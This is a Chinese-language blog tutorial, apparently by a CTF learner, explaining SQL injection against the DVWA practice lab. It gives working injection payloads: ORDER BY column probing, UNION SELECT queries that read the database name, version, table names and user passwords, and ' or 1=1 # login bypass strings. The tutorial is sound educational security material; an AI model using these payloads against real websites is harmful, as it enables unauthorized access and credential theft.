• CTF之SQL注入详解


           前言:最近打算玩一下CTF,玩过CTF的都知道SQL注入是CTF中最重要的题型。但是。。。。。。。。。很多大佬的WP都是一阵操作猛如虎。很多都不带解释的(大佬觉得简单所以就不解释了=_= =_= =_=)。所以这几天一直都在看关于SQL注入的文章,一直也不理解SQL注入的原理。今天刚好看到了一篇文章,自己也跟着那个博主的思路总结一下,对SQL注入有了一个大概的的理解。写这篇博文一是希望加深自己对SQL注入的理解二也希望能帮助那些还不是特别理解SQL注入的人

          参考 链接 https://www.jianshu.com/p/078df7a35671

         

       SQL注入

    一.  Sql注入入门知识点总结

    1. 猜解数据库

    1)     设想这样的一个场景当我们要输入一个用户id,我们输入栏中输入1

    这时候其实在后台执行的代码为

    SELECT first_name, last_name FROM users WHERE user_id = '1';

    2)     如果我们不按常理出牌而是在输入框中输入1‘ order by 1#

    那么这时候后台执行的代码就变成了:

    SELECT first_name, last_name FROM users WHERE user_id = '1' order by 1 #‘(按照sql的语法#起注释作用所以#后面的单引号就被注释掉了)

    当我们输入order by 1的时候可能不会报错那么我们这时候可以尝试 23456,直到报错为止

           假如当数字等于3的时候报错,那说明当前表只有两个字段并且只有2列

    1. 接下来使用union select 联合查询继续获取信息

    Union select运算符可以将两个或者两个以上的select语句查询结果集合合并成一个结果集合显示,即执行联合查询需要注意的是使用union查询的时候需要和主查询的列数相等,而且我们之前已经知道主查询的列数是2,接下来就好办了

    1)     这时候我们输入1‘ union select database(),user()#进行查询

    l  Database()将会返回当前网站所使用的数据库名字

    l  User()将会返回执行当前查询的用户名

    实际执行的sql语句是:

    SELECT first_name, last_name FROM users WHERE user_id = '1' union select database(),user() #;

     

           通过查询的结果我们可以清晰的看出

    u  当前执行查询用户名为root@localhost

    u  当前使用的数据库是dvwa

    2)     接下来我们尝试获取输入1' union select version(),@@version_compile_os#进行查询

    u  version() 获取当前数据库版本.

    u  @@version_compile_os 获取当前操作系统

    实际执行的sql语句是 :

    SELECT first_name, last_name FROM users WHERE user_id = '1' union select version(),@@version_compile_os#`;

     

             db的版本以及操作系统的类型

    u  当前数据库版本为 : 5.6.31-0ubuntu0.15.10.1.

    u  当前操作系统为 : debian-linux-gnu

    3)     接下来我们尝试获取dvwa数据库中表名

    information_schema 是 mysql 自带的一张表,这张数据表保存了 Mysql 服务器所有数据库的信息,如数据库名,数据库的表,表栏的数据类型与访问权限等。该数据库拥有一个名为 tables 的数据表,该表包含两个字段 table_name 和 table_schema,分别记录 DBMS 中的存储的表名和表名所在的数据库。

           我们输入1‘ union select table_names,table_schema from information_schema.tables where table_schema = ‘dvwa’ #

           实际执行的的sql语句是:

           SELECT first_name, last_name FROM users WHERE user_id = '1' union select table_name,table_schema from information_schema.tables where table_schema= 'dvwa'#`;

     

            通过查询的结果我们可以清晰的看出

    l  Dvwa数据库有两个数据表,分别是guestbook,和users

    4)     接下来我们尝试获取重量级用户名和密码

    由经验我们可以大胆猜测users数据表里面的字段是user 和password所以输入:

    1’ union select user,password from users #

    实际执行的的sql语句是:

    SELECT first_name, last_name FROM users WHERE user_id = '1' union select user,password from users#`;

    通过查询的结果我们可以清晰的看出

    l  用户名以及密码

    二.  Sql注入实验二验证绕过

    1. 接下来我们将看下面的登陆页面 

       如过我们随便输入 比如 23 232 这时候会报错

    1. 怎么做能绕过登陆页面呢?

    我们可以尝试输入 123 ‘ or 1=1 123 ‘ or 1=1

    这时候我们可以看到

     

    这时候我们不禁会想为什么呢?下面我们就来分析一下

    实际执行的的sql语句是:

    select * from users where username='123' or 1=1 #' and password='123' or 1=1 #'

    按照mysql的语法#后面的东西会被忽略掉所以即便我们即便输入 ‘ or 1=1 #(密码栏不输入东西结果也是一样的)

    由于判断语句 or 1=1 恒成立所以不管前面输入的什么都能成功登陆

    我们不在尝试使用#屏蔽单引号,采用手动闭合式

    123‘ or ‘1’ =’1 这样同样能登陆成功

    后记:SQL注入需要大量的练习以及经验的总结,这里仅仅介绍了一些最基本的一些玩法,后面如果遇到一些好玩的注入我也会在这里分享。

     未完待续。。。。

       

  • 相关阅读:
    聊天界面的实现
    继续,迫不及待想学数据库
    今天休息,我来研究上次的代码了
    项目导入
    命令行常用的一下命令
    svn的安装和基本操作,及常见问题
    maven项目里写测试
    Eclipse里新建maven项目
    maven简介
    重装win7,没有管理员权限,没有以管理员身份运行
  • 原文地址:https://www.cnblogs.com/baimaoma/p/8608490.html
Copyright © 2020-2023  润新知